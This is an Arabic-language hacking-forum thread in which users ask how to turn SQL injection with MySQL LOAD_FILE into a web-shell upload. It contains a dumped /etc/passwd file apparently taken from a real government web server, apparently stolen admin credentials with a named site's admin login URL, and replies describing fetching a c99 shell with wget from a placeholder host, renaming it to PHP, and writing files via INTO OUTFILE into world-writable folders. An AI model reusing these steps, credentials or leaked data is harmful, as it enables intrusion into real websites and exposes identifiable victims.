![]() |
كيف الاستفادة من امر LOAD_FILE('\') بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته كيفكم شباب ان شاء الله بخير ندخل في الموضوع اعتقد الموضوع واضح كيف استفيد من الامر load_file('\') مثلا عند اخراج مثل هذه المعلومات بالامر /etc/password root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin eodi:x:1000:1000:eodi,,,:/home/eodi:/bin/bash ting:x:1001:1001:ting eodi,,,:/home/ting:/bin/bash mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false adminopdc:x:1002:1002:adminopdc,,,:/home/adminopdc:/bin/bash proftpd:x:106:65534::/var/run/proftpd:/bin/false ftp:x:107:65534::/home/ftp:/bin/false opdcmoi:x:1017:100:opdcmoi:/data/www/www.opdc.go.th/moi:/bin/sh goodpractice:x:1014:100:goodpractice:/data/www/www.opdc.go.th/goodpracticemodel:/bin/sh websiteopdc:x:1012:100:websiteopdc:/data/www/www.opdc.go.th:/bin/sh gcs:x:1010:100:gcs:/data/www/www.opdc.go.th/gcs:/bin/sh tkhpo:x:1009:100:tkhpo:/data/www/www.opdc.go.th/tkhpo:/bin/sh km:x:1008:100:km:/data/www/km.opdc.go.th:/bin/sh webmaster:x:1007:100:webmaster:/data/www/www.opdc.go.th:/bin/sh incentives50:x:1000:100:incentives50:/data/www/www.opdc.go.th/incentives50:/bin/sh munin:x:108:115::/var/lib/munin:/bin/false clamav:x:109:116::/var/lib/clamav:/bin/false postfix:x:110:118::/var/spool/postfix:/bin/false test:x:1003:100:test,test,,:/home/test:/bin/bash moiftp:x:1005:100:moiftp,,,:/data/www/moi.opdc.go.th:/bin/sh tkhpoftp:x:1006:100:tkhpoftp,,,:/data/www/tkhpo.opdc.go.th:/bin/sh gcsftp:x:1004:100:gcsftp,,,:/data/www/gcs.opdc.go.th/:/bin/sh incentives:x:1011:100:incentives,,,:/data/www/incentives.opdc.go.th:/bin/sh osmftp:x:1013:100:osm,,,:/data/www/osm.opdc.go.th:/bin/sh وفي امر ثاني مجنني كلما اخترق موقع بثغرة SQL مااستفيد منه اي شي لان لا استطيع رفع الشل وفي موضوع يقول لفولوكانو الى يضع مكان للابلود في الصفحة مافهمت منه اي شي واطبق مع لاكن بدون فائدة وفي طريقة ثانية ايضا الي يقول into_file هيك شي لاكن المشكلة يقول لازم الماجك كوتس اوف بس اليمحيرني الماجك كوتس يتخطى بالتشفير لاكن لماذا هذا لايتخطى انا قصدي موضوع حسين اكس وارجو ان القا الاجابات المفرحة باذن الله وشكرا |
وعليكم السلام ورحمة الله وبركاته السؤال الاول وهو امر load_file('/')وتقوم بوضعه في الجدول المصاب فاذا ظهر لك خطأ فلا تستطيع ذلك اما اذا لم يظهر فيمكنك المتابعة بالحق واضافة ملف ثم رفع شل في الحقن وانت عندما اظهرت يوزرات المواقع هذا ليس sql وانما remote file include وبهذه تستطيع ايضا ان ترفع شل بالامر wget www.xxxx.com/c99.txt الاكسات تضع بدلها شل txt ثم تقوم بالامر mv c99.txt c99.php وبهذا رفعت شل لكن ليس في كل المواقع تقبل رفع ش (اذهب الى الدرس 8 في دورة استغلال الثغرات) السؤال الثاني انه ليس كل السكربتات المصابة وتدخل لوحة التحكم تسمح برفع شل فيها لاكن ليس كلهاا واما عن into_file فهو تكملة للامرload_file('/') وتضعه في نهاية الاستغلال وتضع الملف اللي ترفع عليه ويحب ان يكون عندك ملف عليه تصريح 777 وتستطيع معرفة ذلك عن طريق رؤية مجلد الصور والماجيك كوتس تظهره من اللود فايل كما قلت اذا ظهر خطأ فهذا مفعل اذا لم يظهر هذا اوف وبهذا تكون رفعت شلفدتك واتمنى اني افدتك |
اقتباس:
اخي العزيز هل قصدك وضع wget www.xxxx.com/c99.txt في load_file('\') يعني load_file('\ wget www.xxxx.com/c99.txt) وماجاوبتني على اليوزرات ماذا استفاد منها smilies5 |
اذا تريد ضغ رابط الموقع المصاب مع الاستغلاللحتى نكمل لك لانك شوية مش فاهم القصة |
اخي خذ هذا المثل تم استخراج اليوزر والباس لاكن مااستفدت اي شي منه اليوزر: delider الباسوورد: stormfury وهذا لوحة التحكم http://www.amaigabeko.com/admin/login.php يعني معقولة كلما اخترق موقع بالـSQL مااقدر ارفع عليه شل |
في شرح بقسم sql كيف ترفع شل من هاي النقطه (راجع المواضيع المثبته بقسم sql ) |
l الاكسات تضع بدلها شل txt ثم تقوم بالامر mv c99.txt c99.php حياك الله اخي انا عندي نفس المشكلة وعندي سؤال اخي الفاضل او نوعا ما اريد منك شرح سريعا لو كان امكن هل نضع داك الامر ورابط الشل في العومد المصاب متلا اخي انا عندي موقع مصاب نعتبر www.yyy.com=1,2,3,4,5,6- العمود الرابع هو المصاب هل نضع الامر الدي كتبت مع رابط الشل في العمود المصاب ؟ |
الساعة الآن 02:03 PM |
[ vBspiders.Com Network ]